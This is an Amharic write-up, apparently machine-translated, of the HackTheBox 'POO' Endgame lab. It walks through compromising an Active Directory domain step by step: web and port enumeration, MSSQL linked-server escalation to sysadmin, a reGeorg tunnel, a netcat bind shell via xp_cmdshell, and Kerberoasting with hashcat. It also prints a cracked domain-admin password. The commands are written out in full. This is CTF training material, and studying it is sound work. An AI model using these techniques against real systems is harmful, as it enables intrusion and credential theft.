🥇 HackTheBox የመጨረሻ ጨዋታ። የባለሙያ አፀያፊ ስራዎች ቤተ ሙከራን ማጠናቀቅ። ንቁ ማውጫ Pentest

በዚህ ጽሑፍ ውስጥ ማሽንን ብቻ ሳይሆን ከጣቢያው ላይ ያለውን አጠቃላይ ሚኒ-ላብራቶሪ ምንባቡን እንመረምራለን HackTheBox.

በመግለጫው ላይ እንደተገለጸው፣ POO በሁሉም የጥቃቶች ደረጃዎች በትንሽ አክቲቭ ዳይሬክተሪ አካባቢ ውስጥ ችሎታዎችን ለመፈተሽ የተቀየሰ ነው። ግቡ ያለውን አስተናጋጅ ማላላት፣ ልዩ መብቶችን ማሳደግ እና በመጨረሻም በሂደቱ ውስጥ 5 ባንዲራዎችን በመሰብሰብ መላውን ጎራ ማላላት ነው።

ከላቦራቶሪ ጋር ያለው ግንኙነት በ VPN በኩል ነው. ስለመረጃ ደህንነት አንድ ነገር ከሚያውቁ ሰዎች ጋር ወደ ግል አውታረመረብ ሲገቡ ከሚሰራ ኮምፒተር ወይም ለእርስዎ ጠቃሚ መረጃ ካለበት አስተናጋጅ እንዳይገናኙ ይመከራል 🙂

ድርጅታዊ መረጃ
ስለ አዳዲስ መጣጥፎች፣ ሶፍትዌሮች እና ሌሎች መረጃዎች ለማወቅ እንዲችሉ እኔ ፈጠርኩ። የቴሌግራም ሰርጥ и በማንኛውም ጉዳዮች ላይ ለመወያየት ቡድን በ IIKB አካባቢ. እንዲሁም የእርስዎ የግል ጥያቄዎች፣ ጥያቄዎች፣ ጥቆማዎች እና ምክሮች አይቼ ለሁሉም መልስ እሰጣለሁ።.

ሁሉም መረጃዎች ለትምህርታዊ ዓላማዎች ብቻ የተሰጡ ናቸው። የዚህ ሰነድ ደራሲ ይህንን ሰነድ በማጥናት የተገኘውን እውቀት እና ዘዴዎች በመጠቀም በማንም ላይ ለሚደርሰው ጉዳት ምንም አይነት ሃላፊነት አይወስድም.

መግቢያ

ይህ የመጨረሻ ጨዋታ ሁለት ማሽኖችን ያቀፈ ሲሆን 5 ባንዲራዎችን ይዟል።

ያለው አስተናጋጅ መግለጫ እና አድራሻም ተሰጥቷል።

Мачнем!

ባንዲራ እንደገና ያንሱ

ይህ ማሽን የአይ ፒ አድራሻ አለው 10.13.38.11 ወደ /etc/hosts የምጨምረው።
10.13.38.11 poo.htb

የመጀመሪያው እርምጃ ክፍት ወደቦችን መቃኘት ነው. ሁሉንም ወደቦች በ nmap ለመቃኘት ረጅም ጊዜ ስለሚወስድ በመጀመሪያ በ masscan አደርገዋለሁ። ሁሉንም TCP እና UDP ወደቦች ከ tun0 በይነገጽ በ 500pps እንቃኛለን።

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

አሁን፣ በወደቦቹ ላይ ስለሚሰሩ አገልግሎቶች የበለጠ ዝርዝር መረጃ ለማግኘት፣ በ -A አማራጭ እንቃኝ።

nmap -A poo.htb -p80,1433

ስለዚህ፣ IIS እና MSSQL አገልግሎቶች አሉን። በዚህ አጋጣሚ የጎራ እና የኮምፒዩተር ትክክለኛ የዲ ኤን ኤስ ስም እናገኛለን። በድር አገልጋዩ ላይ፣ በ IIS መነሻ ገጽ ሰላምታ ተሰጥቶናል።

ስለ ማውጫዎቹ እንድገመው። ለዚህ ጎቡስተር እጠቀማለሁ። በመለኪያዎቹ ውስጥ የዥረቶች ብዛት 128 (-t)፣ URL (-u)፣ መዝገበ ቃላት (-w) እና እኛን የሚስቡን (-x) ቅጥያዎችን እንገልጻለን።

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

ስለዚህ፣ ለ/አስተዳዳሪው ማውጫ፣ እንዲሁም የ.DS_Store ዴስክቶፕ አገልግሎት ማከማቻ ፋይል HTTP ማረጋገጫ አለን። .DS_Store ለአቃፊ የተጠቃሚ ቅንብሮችን የሚያከማቹ እንደ የፋይሎች ዝርዝር፣ የአዶ ቦታ፣ የተመረጠ የጀርባ ምስል ያሉ ፋይሎች ናቸው። እንዲህ ዓይነቱ ፋይል በድር ገንቢዎች የድር አገልጋይ ማውጫ ውስጥ ሊጠናቀቅ ይችላል። ስለዚህ, ስለ ማውጫው ይዘት መረጃ እናገኛለን. ለዚህም መጠቀም ይችላሉ DS_መደብር ጎብኚ.

python3 dsstore_crawler.py -i http://poo.htb/

የማውጫውን ይዘቶች እናገኛለን. እዚህ በጣም የሚያስደስት ነገር የ / dev ማውጫ ነው, ከእሱ ውስጥ ምንጮችን እና ዲቢ ፋይሎችን በሁለት ቅርንጫፎች ውስጥ ማየት እንችላለን. ግን አገልግሎቱ ለአይአይኤስ አጭር ስም የተጋለጠ ከሆነ የመጀመሪያዎቹን 6 የፋይል እና የማውጫ ስሞችን መጠቀም እንችላለን። ይህንን ተጋላጭነት በመጠቀም ማረጋገጥ ይችላሉ። አይአይኤስ አጭር ስም ስካነር.

እና በ"poo_co" የሚጀምር አንድ የጽሁፍ ፋይል እናገኛለን። ቀጥሎ ምን ማድረግ እንዳለብኝ ሳላውቅ በቀላሉ ከመዝገበ-ቃላቱ መዝገበ ቃላት በ"ኮ" የሚጀምሩትን ቃላት ሁሉ መርጫለሁ።

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

እና በ wfuzz ይድገሙት።

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

እና ትክክለኛውን ቃል ያግኙ! ይህንን ፋይል እንመለከታለን፣ ምስክርነቱን እናስቀምጥ (በ DBNAME ግቤት በመመዘን እነሱ ከ MSSQL የመጡ ናቸው።)

ባንዲራውን አስረክበን በ20% እናድገዋለን።

ሆ ባንዲራ

ከ MSSQL ጋር እንገናኛለን፣ DBeaverን እጠቀማለሁ።

በዚህ ዳታቤዝ ውስጥ ምንም የሚያስደስት ነገር አላገኘንም፣ እስቲ SQL Editor እንፍጠር እና ተጠቃሚዎች ምን እንደሆኑ እንፈትሽ።

SELECT name FROM master..syslogins;

ሁለት ተጠቃሚዎች አሉን። መብቶቻችንን እንፈትሽ።

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

ስለዚህ, ምንም ልዩ መብቶች የሉም. የተገናኙትን አገልጋዮች እንይ, ስለዚህ ዘዴ በዝርዝር ጽፌያለሁ እዚህ.

SELECT * FROM master..sysservers;

ስለዚህ ሌላ SQL አገልጋይ እናገኛለን። ክፍት መጠይቅ () በመጠቀም በዚህ አገልጋይ ላይ የትእዛዞችን አፈጻጸም እንፈትሽ።

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

እና የጥያቄ ዛፍ እንኳን መገንባት እንችላለን።

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

እውነታው ግን ለተገናኘ አገልጋይ ጥያቄ ስናቀርብ ጥያቄው የሚከናወነው በሌላ ተጠቃሚ አውድ ውስጥ ነው! በተገናኘው አገልጋይ ላይ ምን የተጠቃሚ አውድ እያሄድን እንደሆነ እንይ።

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

እና አሁን ከተገናኘው አገልጋይ ወደ እኛ የቀረበው ጥያቄ በየትኛው አውድ እንደሚፈፀም እንይ!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

ስለዚህ፣ ሁሉም መብቶች ሊኖሩት የሚገባው የDBO አውድ ነው። ከተገናኘ አገልጋይ ጥያቄ ሲቀርብ ልዩ መብቶችን እንፈትሽ።

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

እንደሚመለከቱት, ሁሉም ልዩ መብቶች አሉን! አስተዳዳሪያችንን እንደዚህ እንፍጠር። ነገር ግን በክፍት መጠይቅ አይፈቅዱላቸውም፣ በ EXECUTE AT እናድርገው።

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

እና አሁን ከአዲሱ ተጠቃሚ ምስክርነቶች ጋር እንገናኛለን, አዲሱን የባንዲራ ዳታቤዝ ይከታተሉ.

ይህንን ባንዲራ አስረክበን ወደ ፊት እንሄዳለን።

የኋላ ትራክ ባንዲራ

MSSQLን ተጠቅመን ዛጎሉን እናግኘው፣ እኔ ከኢምፓኬት ፓኬጅ mssqlclient እየተጠቀምኩ ነው።

mssqlclient.py ralf:ralfralf@poo.htb -db POO_PUBLIC

የይለፍ ቃሎችን ማግኘት አለብን, እና ቀደም ሲል ያገኘነው የመጀመሪያው ነገር ጣቢያው ነው. ስለዚህ, የድር አገልጋይ ማዋቀር እንፈልጋለን (ምቹ ሼል ለመጣል የማይቻል ነው, ፋየርዎል እየሰራ እንደሆነ ይመስላል).

ግን መዳረሻ ተከልክሏል። ምንም እንኳን ፋይሉን ከ MSSQL ማንበብ ብንችልም፣ ምን ዓይነት የፕሮግራም አወጣጥ ቋንቋዎች እንደተዋቀሩ ማወቅ ብቻ ያስፈልገናል። እና በ MSSQL ማውጫ ውስጥ Python እንዳለ አውቀናል.

ከዚያ የ web.config ፋይልን ለማንበብ ምንም ችግር የለም.

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

ምስክርነቶች ከተገኙ፣ ወደ/አስተዳዳሪ ይሂዱ እና ባንዲራውን ይውሰዱ።

የእግረኛ ባንዲራ

እንደ እውነቱ ከሆነ ፋየርዎልን ለመጠቀም አንዳንድ ችግሮች አሉ, ነገር ግን የአውታረ መረብ ቅንብሮችን ስንመለከት, IPv6 ፕሮቶኮል ጥቅም ላይ እንደሚውል እናስተውላለን!

ይህንን አድራሻ ወደ /etc/hosts ያክሉ።
dead:babe::1001 poo6.htb
አስተናጋጁን እንደገና እንቃኘው፣ ግን በዚህ ጊዜ በIPv6።

እና የWinRM አገልግሎት በ IPv6 ላይ ይገኛል። ከተገኙት ምስክርነቶች ጋር እንገናኝ።

በዴስክቶፑ ላይ ባንዲራ አለ፣ አስረክብ።

የተለጠፈ ባንዲራ

ጋር አስተናጋጅ ላይ ስለላ በኋላ ዊንፔስ የተለየ ነገር አላገኘንም። ከዚያ እንደገና ምስክርነቶችን ለመፈለግ ተወሰነ (እኔም በዚህ ርዕስ ላይ ጽፌያለሁ ጽሑፍ). ነገር ግን ሁሉንም SPNs ከስርዓቱ በዊንአርኤም ማግኘት አልቻልኩም።

setspn.exe -T intranet.poo -Q */*

ትዕዛዙን በ MSSQL በኩል እናስፈጽም.

በዚህ መንገድ የተጠቃሚዎችን SPN p00_hr እና p00_adm እናገኛለን፣ ይህ ማለት እንደ ከርቤሮአስተን ላሉ ጥቃቶች ተጋላጭ ናቸው ማለት ነው። በአጭሩ፣ የይለፍ ቃሎቻቸውን ሃሽ ማግኘት እንችላለን።

በመጀመሪያ የ MSSQL ተጠቃሚን ወክለው የተረጋጋ ሼል ማግኘት አለቦት። ነገር ግን መዳረሻው የተገደበ ስለሆንን ከአስተናጋጁ ጋር ግንኙነት ያለን በወደቦች 80 እና 1433 ብቻ ነው። ነገር ግን ወደብ 80 ትራፊክ መሿለኪያ ይቻላል! ለዚህ እንጠቀማለን የሚቀጥለው መተግበሪያ. የ tunnel.aspx ፋይልን ወደ የድር አገልጋይ መነሻ ማውጫ እንጭነው - C: inetpubwwwroot።

ግን እሱን ለማግኘት ስንሞክር 404 ስህተት ይደርስብናል ይህ ማለት *.aspx ፋይሎች አይተገበሩም ማለት ነው። በእነዚህ ቅጥያዎች ፋይሎችን ለማስኬድ ASP.NET 4.5 ን እንደሚከተለው ይጫኑ።

dism /online /enable-feature /all /featurename:IIS-ASPNET45

እና አሁን, tunnel.aspx ን ስንደርስ, ሁሉም ነገር ለመሄድ ዝግጁ ነው የሚለውን መልስ እናገኛለን.

ትራፊክን የሚያስተላልፈውን የመተግበሪያውን ደንበኛ ክፍል እንጀምር። ሁሉንም ትራፊክ ከወደብ 5432 ወደ አገልጋዩ እናስተላልፋለን።

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

እና የማንኛውም መተግበሪያ ትራፊክ በእኛ ፕሮክሲ ለመላክ ፕሮክሲ ቼይንን እንጠቀማለን። ይህን ተኪ ወደ /etc/proxychains.conf ውቅረት ፋይል እንጨምር።

አሁን ፕሮግራሙን ወደ አገልጋዩ እንጭነው netcat, ከእሱ ጋር የተረጋጋ ማሰሪያ ቅርፊት እናደርጋለን, እና ስክሪፕቱ ከርቤሮስትን ጥራየ Kerberoasting ጥቃትን የምንፈጽምበት.

አሁን፣ በ MSSQL በኩል፣ ሰሚውን እናስጀምረዋለን።

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

እና በፕሮክሲያችን በኩል እንገናኛለን።

proxychains rlwrap nc poo.htb 4321

እና ሃሽቹን እንውሰድ.

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

በመቀጠል በእነዚህ ሃሽዎች ላይ መደጋገም ያስፈልግዎታል. ሮክዮው የይለፍ ቃል ዳታ መዝገበ ቃላት ስላልነበረኝ በሴክሊስት ውስጥ የቀረቡትን ሁሉንም የይለፍ ቃሎች መዝገበ ቃላት ተጠቀምኩ። ለመቁጠር ሃሽካትን እንጠቀማለን።

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

እና ሁለቱንም የይለፍ ቃሎች፣ የመጀመሪያው በ dutch_passwordlist.txt መዝገበ-ቃላት ውስጥ እና ሁለተኛው በ Keyboard-Combinations.txt ውስጥ እናገኛለን።

እና ስለዚህ ሶስት ተጠቃሚዎች አሉን, ወደ ጎራ መቆጣጠሪያ እንሄዳለን. መጀመሪያ አድራሻውን እንወቅ።

በጣም ጥሩ፣ የጎራ መቆጣጠሪያውን የአይፒ አድራሻ ተምረናል። ሁሉንም የጎራ ተጠቃሚዎችን እና እንዲሁም የትኛው አስተዳዳሪ እንደሆነ እንወቅ። PowerView.ps1 መረጃ ለማግኘት ስክሪፕቱን ለማውረድ። ከዚያም በ -s መለኪያ ውስጥ ማውጫውን ከስክሪፕት ጋር በመግለጽ ክፉ-ዊን በመጠቀም እንገናኛለን. እና ከዚያ የ PowerView ስክሪፕቱን ብቻ ይጫኑ።

አሁን ሁሉንም ተግባራቶቹን ማግኘት አለን. የp00_adm ተጠቃሚ መብት ያለው ተጠቃሚ ይመስላል፣ ስለዚህ በእሱ አውድ ውስጥ እንሰራለን። ለዚህ ተጠቃሚ የPSCRidential ነገር እንፍጠር።

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

አሁን Creds የምንገልፅባቸው ሁሉም የPowershell ትዕዛዞች p00_admን በመወከል ይፈጸማሉ። የተጠቃሚዎችን ዝርዝር እና የአስተዳዳሪውን መለያ ባህሪ እናሳይ።

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

እና ስለዚህ፣ የእኛ ተጠቃሚ በእውነት ልዩ መብት አለው። የየትኞቹ ቡድኖች አባል እንደሆነ እንይ።

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

በመጨረሻ ተጠቃሚው የጎራ አስተዳዳሪ መሆኑን እናረጋግጣለን። ይህ በርቀት ወደ ጎራ መቆጣጠሪያ ለመግባት መብት ይሰጠዋል. ዋሻችንን ተጠቅመን በWinRM ለመግባት እንሞክር። ክፉ-ዊርም ሲጠቀሙ በሬጂኦርጅ በተሰጡት ስህተቶች ግራ ተጋባሁ።

ከዚያ ሌላ ቀላል እንጠቀማለን ስክሪፕት ከ WinRM ጋር ለመገናኘት. የግንኙነት መለኪያዎችን ይክፈቱ እና ይቀይሩ።

ለመገናኘት እንሞክራለን, እና በስርዓቱ ውስጥ ነን.

ባንዲራ ግን የለም። ከዚያ ተጠቃሚውን ይመልከቱ እና ዴስክቶፖችን ያረጋግጡ።

mr3ks ላይ ባንዲራውን እናገኛለን እና ላቦራቶሪው 100% ተጠናቅቋል።

ይኼው ነው. እንደ ግብረ መልስ፣ ከዚህ ጽሑፍ አዲስ ነገር እንደተማርክ እና ለእርስዎ ጠቃሚ ስለመሆኑ አስተያየት ይስጡ።

በ ላይ ሊቀላቀሉን ይችላሉ። ቴሌግራም. እዚያም አስደሳች ቁሳቁሶችን, የተዋሃዱ ኮርሶችን እና እንዲሁም ሶፍትዌሮችን ማግኘት ይችላሉ. ብዙ የአይቲ ዘርፎችን የሚያውቁ ሰዎች የሚኖሩበት ማህበረሰብ እንሰበስብ፣ ከዚያም በማንኛውም የአይቲ እና የመረጃ ደህንነት ጉዳዮች ላይ ሁሌም መረዳዳት እንችላለን።

ምንጭ: hab.com